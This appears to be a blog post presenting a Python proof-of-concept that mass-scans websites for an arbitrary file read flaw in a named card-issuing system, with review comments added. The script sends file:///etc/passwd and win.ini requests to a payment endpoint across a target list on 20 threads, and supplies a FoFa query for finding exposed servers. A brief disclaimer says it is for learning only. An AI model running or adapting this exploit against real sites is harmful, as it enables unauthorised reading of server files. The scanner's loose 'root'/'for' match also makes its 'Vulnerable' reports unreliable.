[武器化學習] 鯨髮卡系統虛擬卡系統任意檔案讀取漏洞poc

bamuwe發表於2024-07-13
#!/usr/bin/env python3
import requests
from termcolor import colored
from tqdm import tqdm
from concurrent.futures import ThreadPoolExecutor, as_completed ,CancelledError
import os
import signal
import sys

# Startup banner. The text block opens with the author's notice (in Chinese)
# that the program is for exchange and learning only and that any unauthorized
# penetration test is illegal, followed by ASCII art and the author's GitHub URL.
# The literal is not a raw string, so Python interprets the backslash sequences
# inside the art before printing it.
print('''

本程式僅用於交流學習使用,任何未經授權的滲透測試都是違法行為                    
                                                                          
/|                  __  __   ___                           __.....__      
||                 |  |/  `.'   `.             _     _ .-''         '.    
||                 |   .-.  .-.   '      /\    \\   ///     .-''"'-.  `.  
||  __        __   |  |  |  |  |  |      `\\  //\\ ///     /________\   \ 
||/'__ '.  .:--.'. |  |  |  |  |  |  _    _\`//  \'/ |                  | 
|:/`  '. '/ |   \ ||  |  |  |  |  | | '  / |\|   |/  \    .-------------' 
||     | |`" __ | ||  |  |  |  |  |.' | .' | '        \    '-.____...---. 
||\    / ' .'.''| ||__|  |__|  |__|/  | /  |           `.             .'  
|/\'..' / / /   | |_              |   `'.  |             `''-...... -'    
'  `'-'`  \ \._,\ '/              '   .'|  '/                             
           `--'  `"                `-'  `--'     https://github.com/bamuwe
      ''')
# Prints the vulnerability name (Chinese): arbitrary file read in the
# card-issuing system named in the page title.
print("漏洞名稱:鯨髮卡系統虛擬卡系統任意檔案讀取漏洞\n")

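# Make sure both working files exist: urls.txt is the input list (one base URL
# per line) and result.txt collects the URLs that main() flags.
for filename in ['urls.txt', 'result.txt']:
    if not os.path.exists(filename):
        # Opening a missing path in 'w' mode simply creates an empty file.
        with open(filename, 'w'):
            print(f"[*] Created successfully {filename}")

# Usage hint and the author's FoFa search expression, printed as-is.
print(r'[!] Usage : echo \'http://example.com\' > urls.txt && python3 poc.py')
print('[!] FoFa = "/static/theme/maowang51/css/style.css" && status_code="200" && country="CN"')
print()

# The loop above always leaves urls.txt in place, so an existence test can
# never fire. Test for an empty input list instead, which is what the message
# reports. sys.exit() is used because the bare exit() helper is only installed
# by the site module.
if os.path.getsize('urls.txt') == 0:
    print('urls.txt is empty')
    sys.exit(0)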
    
# Stop flag raised by the SIGINT handler; main() checks it while it collects
# completed futures.
should_stop = False


def signal_handler(sig, frame):
    """Handle SIGINT: raise the stop flag, notify the user, exit with status 0.

    Args:
        sig: Signal number supplied by the interpreter (unused).
        frame: Interrupted stack frame supplied by the interpreter (unused).

    Raises:
        SystemExit: Always, with exit code 0.
    """
    global should_stop
    should_stop = True
    print("\nInterrupt signal received and trying to stop the program...")
    # Same effect as sys.exit(0): SystemExit unwinds from the interrupted point.
    raise SystemExit(0)


# Install the handler for Ctrl-C.
signal.signal(signal.SIGINT, signal_handler)

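# Handle a single target URL.
def process_target(target):
    """Send one GET request to *target* and report whether the reply looks like a hit.

    Args:
        target: Complete request URL (a base URL from urls.txt with the probe
            path already appended by the caller).

    Returns:
        ``target`` when the response status is 200 and the body contains the
        substring ``'root'`` or ``'for'``; ``None`` otherwise, including when
        ``requests`` raises any ``RequestException``.
    """
    try:
        # Bound the wait: without a timeout a silent host pins a worker thread
        # indefinitely and the pool can never finish or shut down cleanly.
        response = requests.get(target, timeout=10)
    except requests.RequestException:
        # Unreachable or misbehaving hosts are treated as "not flagged".
        return None

    body = response.text
    # NOTE(review): these substring checks are very loose. 'for' occurs in most
    # English HTML or JSON bodies and 'root' in many, so any ordinary 200 page
    # can be flagged. Treat every entry written to result.txt as a candidate
    # that still needs manual confirmation, not as a confirmed finding.
    if response.status_code == 200 and ('root' in body or 'for' in body):
        return target
    return None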


def main():
    """Probe every base URL in urls.txt and record the ones process_target() flags.

    Reads base URLs from ``urls.txt``, appends the probe path to each, runs
    process_target() over them on a 20-worker thread pool with a tqdm progress
    bar, prints each flagged URL and appends it to ``result.txt``, then prints
    a summary count.
    """
    global SuccessCount
    # 1-based counter used to number printed hits; the summary prints SuccessCount-1.
    SuccessCount = 1

    with open('urls.txt') as fi:
        # Each probe is an ordinary GET to /pay/xinhui/request_post whose query
        # string carries url=file:///..., so it appears verbatim in web-server
        # access logs. Defenders can search for that path plus a file:// value.
        # NOTE(review): presumably the endpoint fetches whatever `url` names on
        # the server side; if so, the application-side fix is to reject
        # non-http(s) schemes there. Confirm against the application code.
        targets = [line.strip() + '/pay/xinhui/request_post?url=file:///etc/passwd&post_data[1]=aaa' for line in fi]
        # NOTE(review): `fi` was fully consumed by the comprehension above, so
        # this list is always empty and no win.ini request is ever sent. A run
        # with no hits therefore says nothing about Windows-hosted instances.
        targets_windows = [line.strip() + '/pay/xinhui/request_post?url=file:///C:/windows/win.ini&post_data[1]=aaa' for line in fi]

    # Progress bar sized to the total number of requests that will be issued.
    pbar = tqdm(total=len(targets + targets_windows), desc='process')

    with ThreadPoolExecutor(max_workers=20) as executor:
            futures = []
            for target in targets + targets_windows:
                future = executor.submit(process_target, target)
                # Advance the progress bar once this request has finished.
                future.add_done_callback(lambda p: pbar.update())
                futures.append(future)

            for future in as_completed(futures):
                # NOTE(review): signal_handler() calls sys.exit() right after
                # setting should_stop, so this branch looks unreachable in
                # practice. Future.cancel() also returns a bool rather than
                # raising, so the except clause is defensive only.
                if should_stop:
                    try:
                        future.cancel()
                    except CancelledError:
                        pass
                    continue
                # process_target() returns the URL on a match and None otherwise.
                result = future.result()
                if result:
                    # pbar.write() prints the line without breaking the progress bar.
                    pbar.write(colored(f"{SuccessCount}. {result} Vulnerable", 'green'))
                    # Append so results from earlier runs are kept.
                    with open('result.txt', 'a') as f:
                        f.write(result + '\n')
                    SuccessCount += 1

    pbar.close()
    print(colored(f"All targets have been processed {SuccessCount-1} vulnerable targets found", 'cyan'))

# Only the scan itself is guarded. The banner, the file-creation loop and the
# signal registration are module-level statements and also run on import.
if __name__ == "__main__":
    main()
